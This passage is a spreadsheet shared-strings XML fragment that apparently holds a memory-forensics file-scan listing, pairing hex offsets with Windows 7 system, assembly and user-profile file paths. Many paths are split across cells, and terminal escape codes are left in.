    <t>\Windows\System32\DriverStore\FileRepository\brmfcmdm.inf_x86_neutral_3b38c2e8e6f06c1b\brmfcmd</t>
  </si>
  <si>
    <t>m.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64bce8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\comdlg32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64c038</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBas</t>
  </si>
  <si>
    <t>ic.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64c118</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP6199.tmp\Microsoft.PowerShell.GPowerShell</t>
  </si>
  <si>
    <t>0xde64c3a8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\napinit\04258265b15825cb4f98_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64c6d8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mmres.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64c8f0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\gameux.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64caa8</t>
  </si>
  <si>
    <t>0xde64cb60</t>
  </si>
  <si>
    <t>0xde64ce00</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP6ADE.tmp\Microsoft.PowerShell.Security.dl</t>
  </si>
  <si>
    <t>0xde64d038</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msimsg.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64d9b0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Windows.Presentation\3.5.0.0__b77a5c561934e089\System.Window</t>
  </si>
  <si>
    <t>s.Presentatio</t>
  </si>
  <si>
    <t>0xde64da68</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64db90</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP9B74.tmp\System.ComponentModel.DataAnnota</t>
  </si>
  <si>
    <t>tions.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64dc48</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP773B.tmp\Microsoft.Windows.Diagnosis.Comm</t>
  </si>
  <si>
    <t>ands.GetDiagI</t>
  </si>
  <si>
    <t>nput.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xde64df80</t>
  </si>
  <si>
    <t>0xde64e038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_mct_mct-gb_link_61442ee528aa6cdd.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64e380</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\winmm.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64e5c8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\e3a88f707a0e3607532fa1e8e58f22</t>
  </si>
  <si>
    <t>3e\System.Dat</t>
  </si>
  <si>
    <t>a.Entity.ni</t>
  </si>
  <si>
    <t>0xde64e710</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_zh-cn_d74f2fe2301398dc.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64ed38</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx00e.inf_x86_neutral_ecad95350ea4a9ce\prnlx00</t>
  </si>
  <si>
    <t>e.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64ef80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wbengine.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64f240</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wsqmcons.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64f550</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\lpksetup.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64f670</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\51b38287bb1e37b697ce484e0e97</t>
  </si>
  <si>
    <t>6536\System.W</t>
  </si>
  <si>
    <t>Visualization.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64f7c0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_power_en-us_721989d674f7bd04.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64f8e0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP2C8C.tmp\System.Data.Services.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64fa98</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\digitalmediadevice.inf_x86_neutral_6fd673519d66ab</t>
  </si>
  <si>
    <t>20\digitalmed</t>
  </si>
  <si>
    <t>iadevice.in</t>
  </si>
  <si>
    <t>0xde64fe50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_printer_22190c3ab8798fd9.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6501d8</t>
  </si>
  <si>
    <t>0xde650468</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP7135.tmp\Microsoft.Transactions.Bridge.Dt</t>
  </si>
  <si>
    <t>c.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde650520</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ime_en-us_0d349188e45a5789.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde650950</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_boot_en-us_bd4746182a790f00.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde650db8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\fontext.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6510e8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mmc.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6513c0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml.Linq\1537bf6947b697b8b8ec_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6517e0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{6804AFE4-CBF3-4D05-9A7</t>
  </si>
  <si>
    <t>7-92A00C793B4</t>
  </si>
  <si>
    <t>D}_x001B_[0K</t>
  </si>
  <si>
    <t>0xde651a48</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_windowsmediaplayerconfiguration_en-us_b557b8875</t>
  </si>
  <si>
    <t>8a93acd.cdf-m</t>
  </si>
  <si>
    <t>0xde651f80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\shlwapi.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6520f8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ime_imetc10_aead306aeed0be86.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6524e0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ime_imesc5_applets_7ab7847ddb9a9a48.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6528c8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ime_imesc5_46a6606042ef6565.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde652b90</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmfj2.inf_x86_neutral_e800633dd6eedc16\mdmfj2.in</t>
  </si>
  <si>
    <t>0xde652cb0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ime_imekr8_dicts_4b36d5aba5194cae.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde652d98</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_.net_clr_data_0000_9334e121f0277e71.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde653430</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_fi-fi_448337a68202d703.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde653760</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\battery.inf_x86_neutral_5752155055c5e2d7\battery.</t>
  </si>
  <si>
    <t>0xde653818</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_et-ee_429cb6e884dc9948.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde653ae0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\faxcn002.inf_x86_neutral_29a66691dd7a46a5\faxcn00</t>
  </si>
  <si>
    <t>0xde653c00</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_es-es_429cd1a084dc7119.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde653f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_tr-tr_d82784d42e2cf1c3.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde654038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_msdtc_0000_5b1b81b54f36c82e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6542a8</t>
  </si>
  <si>
    <t>\System Volume Information\SPP\OnlineMetadataCache\{ca2e7444-a1a5-459c-a931-762cca21980f}_OnDi</t>
  </si>
  <si>
    <t>skSnapshotPro</t>
  </si>
  <si>
    <t>p_x001B_[0K</t>
  </si>
  <si>
    <t>0xde654428</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\iphlpapi.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde654578</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.Commands.UpdateDiagRootcause\6.1.0.0__3</t>
  </si>
  <si>
    <t>1bf3856ad364e</t>
  </si>
  <si>
    <t>35\Microsof</t>
  </si>
  <si>
    <t>t.Wind</t>
  </si>
  <si>
    <t>ows.Diagnosis.Commands.UpdateDiagRootcause.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde654e20</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wdi.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde655038</t>
  </si>
  <si>
    <t>\Windows\ehome\ehres.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde655bc8</t>
  </si>
  <si>
    <t>0xde655d48</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msv1_0.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde655e00</t>
  </si>
  <si>
    <t>0xde656190</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\iedkcs32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde656410</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\unregmp2.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde656690</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\imaadp32.acm.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde656878</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Data.Entity\3.5.0.0__b77a5c561934e089\System.Data.Entity.dll</t>
  </si>
  <si>
    <t>0xde6569c0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_zh-hk_d74f39cc301389ac.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde656cf0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\icm32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6571c8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP77A9.tmp\Microsoft.Windows.Diagnosis.SDHo</t>
  </si>
  <si>
    <t>0xde657280</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP7821.tmp\Microsoft.Windows.Diagnosis.Comm</t>
  </si>
  <si>
    <t>ands.UpdateDi</t>
  </si>
  <si>
    <t>agRootcause</t>
  </si>
  <si>
    <t>0xde657860</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.AddIn\3.5.0.0__b77a5c561934e089\System.AddIn.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde657988</t>
  </si>
  <si>
    <t>0xde657d10</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Data.Linq\11ae5a31a2baeecf2994_x001B_[0K</t>
  </si>
  <si>
    <t>0xde657ec8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_rdyboost_0000_50c61a1d7330c91d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde657f80</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.IO.Log\3.0.0.0__b03f5f7f11d50a3a\System.IO.Log.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde658038</t>
  </si>
  <si>
    <t>0xde658128</t>
  </si>
  <si>
    <t>0xde6581e0</t>
  </si>
  <si>
    <t>0xde658298</t>
  </si>
  <si>
    <t>0xde658380</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\QAgentRT.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6586a0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ws2_32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde658ab0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmpenr.inf_x86_neutral_8075aaa424f36192\mdmpenr.</t>
  </si>
  <si>
    <t>0xde658f80</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Promp</t>
  </si>
  <si>
    <t>t.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xde659878</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP787B.tmp\Microsoft.Windows.Diagnosis.Comm</t>
  </si>
  <si>
    <t>agReport.dl</t>
  </si>
  <si>
    <t>0xde659a90</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_framework_v3.0_wpf_b56a2354fbfa0c31.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde659ca8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_windows_workflow_foundation_3.0.0.0_0000_c87be1b3a75f787b.cdf-</t>
  </si>
  <si>
    <t>0xde65a038</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\napinit\6.1.0.0__31bf3856ad364e35\NAPINIT.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65a1b8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP7A84.tmp\Microsoft.WSMan.Management.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde65a320</t>
  </si>
  <si>
    <t>0xde65a3e0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ime_imesc5_help_693c441c0201a8fa.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65a560</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Data.Linq\3.5.0.0__b77a5c561934e089\System.Data.Linq.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65a618</t>
  </si>
  <si>
    <t>0xde65aa50</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wcnwiz.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65ad20</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\naphlpr\2e72aab556ef68722e22_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65af80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\8cd9408c8aae4272d37eab1c6732</t>
  </si>
  <si>
    <t>0c3f\System.W</t>
  </si>
  <si>
    <t>orkflow.Act</t>
  </si>
  <si>
    <t>ivitie</t>
  </si>
  <si>
    <t>s.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65b138</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\powrprof.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65b4d8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\PresentationFontCache\3.0.0.0__31bf3856ad364e35\PresentationFontCac</t>
  </si>
  <si>
    <t>he.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65b6f8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\powercfg.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65b818</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmkortx.inf_x86_neutral_25bec1fb48843358\mdmkort</t>
  </si>
  <si>
    <t>x.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65bb00</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cbac21c78dc12e44cfe84aa9ca1a</t>
  </si>
  <si>
    <t>f813\System.W</t>
  </si>
  <si>
    <t>indows.Cont</t>
  </si>
  <si>
    <t>rols.R</t>
  </si>
  <si>
    <t>ibbon.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65bdf0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ie4uinit.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65c580</t>
  </si>
  <si>
    <t>0xde65c638</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Data.DataSetExtensions\3.5.0.0__b77a5c561934e089\System.Data</t>
  </si>
  <si>
    <t>.DataSetExten</t>
  </si>
  <si>
    <t>sions.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde65c6f0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\napsnap\6.1.0.0__31bf3856ad364e35\NAPSNAP.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65c7a8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\SrpUxSnapIn\6.1.0.0__31bf3856ad364e35\SrpUxSnapIn.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65c860</t>
  </si>
  <si>
    <t>0xde65c960</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msfeedsbs.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65cb48</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\powercpl.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65cc98</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Narrator\1e383f50c969cd5ea9fc_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65ce18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB2579686~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65cf80</t>
  </si>
  <si>
    <t>0xde65d038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_power_9d457dc1c7c54838.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65d458</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_wsearchidxpi_a2c41dc1731a4204.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65d618</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_framework_v2.0.50727_e9368840261e60ee.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65d6d0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wialx002.inf_x86_neutral_1dc4f8e789cfb4f0\wialx00</t>
  </si>
  <si>
    <t>0xde65dca0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\swprv.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65dec8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.Commands.UpdateDiagReport\6.1.0.0__31bf</t>
  </si>
  <si>
    <t>3856ad364e35\</t>
  </si>
  <si>
    <t>Microsoft.W</t>
  </si>
  <si>
    <t>indows</t>
  </si>
  <si>
    <t>.Diagnosis.Commands.UpdateDiagReport.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65df80</t>
  </si>
  <si>
    <t>0xde65e140</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mpr.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65e4e0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\00ebd310698988ad05d743e0d073</t>
  </si>
  <si>
    <t>968c\Microsof</t>
  </si>
  <si>
    <t>t.VisualBas</t>
  </si>
  <si>
    <t>ic.Act</t>
  </si>
  <si>
    <t>ivities.Compiler.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65e948</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_esent_0ef70656e1d1b1ac.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65ebe0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_tapisrv_20c65cafb424239c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65ec98</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Web.Entity\d46430b6620f5a8aa936_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65ee38</t>
  </si>
  <si>
    <t>0xde65ef80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_sv-se_d84b8da62ddbdc6c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65f038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP9AB6.tmp\System.AddIn.Contract.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65f3d8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\NetworkExplorer.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65f818</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\napsnap\2fe945b165ddccf1bc6e_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65f8d0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Data.Entity.Design\3.5.0.0__b77a5c561934e089\System.Data.Ent</t>
  </si>
  <si>
    <t>ity.Design.dl</t>
  </si>
  <si>
    <t>0xde65f9a0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\modem.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde65fb88</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\http.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde660288</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6605c0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\rasauto.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde660760</t>
  </si>
  <si>
    <t>0xde6609c8</t>
  </si>
  <si>
    <t>0xde660c98</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\cscsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde660f18</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wpcsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde661038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_3f581daba4c8c835.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6614a0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP6E08.tmp\System.Web.Extensions.Design.dll</t>
  </si>
  <si>
    <t>0xde661a38</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sud.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde662388</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wiaservc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde662538</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\colorcpl.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde662688</t>
  </si>
  <si>
    <t>0xde662740</t>
  </si>
  <si>
    <t>0xde6627f8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP8E77.tmp\PresentationBuildTasks.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde662ad8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\gpscript.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde662b90</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\dfa9bf1017d49c480d0f3dc9e4b7</t>
  </si>
  <si>
    <t>60a8\System.R</t>
  </si>
  <si>
    <t>untime.Dura</t>
  </si>
  <si>
    <t>bleIns</t>
  </si>
  <si>
    <t>tancing.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde662d00</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Speech\9c3e255297be90308bbe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde662f18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_speech_common_en-us_11ebcc5f3c902d23.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde663148</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_termservice_0000_f96d5ce56bc76fc8.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde663738</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\Syst</t>
  </si>
  <si>
    <t>em.Activities</t>
  </si>
  <si>
    <t>0xde663900</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\dmocx.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde663cf8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_dism_en-us_064f3ab06d0848d3.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde663f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\x86_microsoft-windows-servicingstack_31bf3856ad364e35_6.1.7601.23505_none_0bfc</t>
  </si>
  <si>
    <t>08bf3ea166ba\</t>
  </si>
  <si>
    <t>smiengine.d</t>
  </si>
  <si>
    <t>0xde664038</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\d229a0c5-4d4e-455e-9dc5-545994937182_x001B_[0K</t>
  </si>
  <si>
    <t>0xde664280</t>
  </si>
  <si>
    <t>\Windows\System32\acproxy.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6644e8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\ipnat.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde664840</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\a703ffcde085b68cbdaae5d78185</t>
  </si>
  <si>
    <t>0c3d\System.A</t>
  </si>
  <si>
    <t>ctivities.C</t>
  </si>
  <si>
    <t>ore.Pr</t>
  </si>
  <si>
    <t>esentation.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6649a8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP92C5.tmp\PresentationFontCache.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde664f80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5IDSBAN9\2</t>
  </si>
  <si>
    <t>605cf[1].woff</t>
  </si>
  <si>
    <t>0xde665038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_homebasic_fa0efb1c1bd4a64f.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde665170</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_homepremiumn_26b2adbf8ffe6af4.cdf-</t>
  </si>
  <si>
    <t>0xde665558</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_homepremiume_26b2adbf8ffe6aeb.cdf-</t>
  </si>
  <si>
    <t>0xde6660d0</t>
  </si>
  <si>
    <t>0xde6664c0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\a2aa94f6cc5fc28282253a3bb5c0</t>
  </si>
  <si>
    <t>ae81\System.A</t>
  </si>
  <si>
    <t>ctivities.D</t>
  </si>
  <si>
    <t>urable</t>
